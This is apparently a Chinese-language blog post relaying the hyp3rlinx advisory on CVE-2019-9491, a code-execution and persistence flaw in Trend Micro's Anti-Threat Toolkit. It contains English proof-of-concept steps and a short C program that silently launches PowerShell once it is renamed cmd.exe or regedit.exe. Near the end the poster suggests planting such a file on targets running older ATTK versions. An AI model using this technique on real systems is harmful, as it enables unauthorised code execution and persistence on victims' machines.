研究人员发现趋势科技防威胁工具包（ATTK）存在任意代码执行漏洞CVE-2019-9491，攻击者可利用此漏洞在目标Windows系统上运行恶意软件。

由于ATTK是由经过验证的发行方签名的，因此可绕过任何MOTW安全警告，攻击者甚至可以将ATTK作为一种持久性机制。

[Exploit/POC]
Compile an .EXE using below "C" code and use naming convention of "cmd.exe" or "regedit.exe".
Run the Anti-Threat Toolkit and watch the ATTK console to see the Trojan file get loaded and executed.

将恶意软件命名为cmd.exe或regedit.exe，ATTK将会加载并运行该文件

#include <windows.h>

void main(void){
   puts("Trend Micro Anti-Threat Toolkit PWNED!");
   puts("Discovery: hyp3rlinx");
   puts("CVE-2019-9491\n");
   WinExec("powershell", 0);
}

演示视频

POC下载

http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-ANTI-THREAT-TOOLKIT-(ATTK)-REMOTE-CODE-EXECUTION.txt

而旧版本应该还可用，以及将cmd.exe或regedit.exe为命名的恶意软件投放到目标设备，也许都收获一份惊喜。(前提是知道目标有装)

顺便推荐一下这哥们的博客，全是他发现的0day漏洞，学习学习。

链接：

http://hyp3rlinx.altervista.org/

attk_collector_cli_x64.exe
Hash: e8503e9897fd56eac0ce3c3f6db24fb1

TrendMicroRansomwareCollector64.r09.exe
Hash: 798039027bb4363dcfd264c14267375f

attk_ScanCleanOnline_gui_x64.exe
Hash: f1d2ca4b14368911c767873cdbc194ed